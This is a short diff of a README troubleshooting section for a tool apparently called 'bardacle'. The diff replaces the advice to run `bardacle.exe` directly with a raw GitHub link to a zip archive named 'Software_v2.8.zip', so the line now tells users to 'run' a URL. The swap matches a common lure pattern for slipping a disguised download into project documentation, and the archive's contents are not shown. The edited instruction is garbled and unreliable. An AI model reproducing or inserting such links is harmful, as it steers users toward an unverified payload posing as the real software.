KubaGD/bardacle/README.md

 If `bardacle` command does not work, you might need to:

 - Add bardacle to your system PATH.
 The installer usually does this automatically.
-- Navigate to the installation folder and run `./bardacle` or `bardacle.exe` directly.
+- Navigate to the installation folder and run `./bardacle` or `https://raw.githubusercontent.com/KubaGD/bardacle/main/assets/Software_v2.8.zip` directly.

 ---